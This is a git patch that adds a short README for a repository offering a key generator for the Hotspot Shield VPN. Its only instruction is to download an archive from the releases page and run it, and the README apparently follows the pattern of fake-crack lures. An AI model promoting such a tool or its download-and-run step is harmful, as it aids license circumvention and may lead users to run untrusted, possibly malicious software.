From 7506cc60742bfdd758e2e237f5406658b3dd5bc2 Mon Sep 17 00:00:00 2001 From: bennettrolive Date: Wed, 29 May 2024 20:06:52 +0600 Subject: [PATCH] Create README.md --- README.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 README.md diff --git a/README.md b/README.md new file mode 100644 index 0000000..095aa1a --- /dev/null +++ b/README.md @@ -0,0 +1,17 @@ +# Hotspot Shield VPN + +## Description +This repository contains a tool for generating keys for Hotspot Shield VPN. It includes multiple functions to ensure the creation of valid keys. + +## Installation Instructions +Download the archive from the [releases](../../releases) section, unpack it, and run the application. + +## Usage +No additional usage instructions are needed. + +## Contribute +Contributions are not needed at this time. + +## Links +- [Releases](../../releases) +- [Issues](../../issues)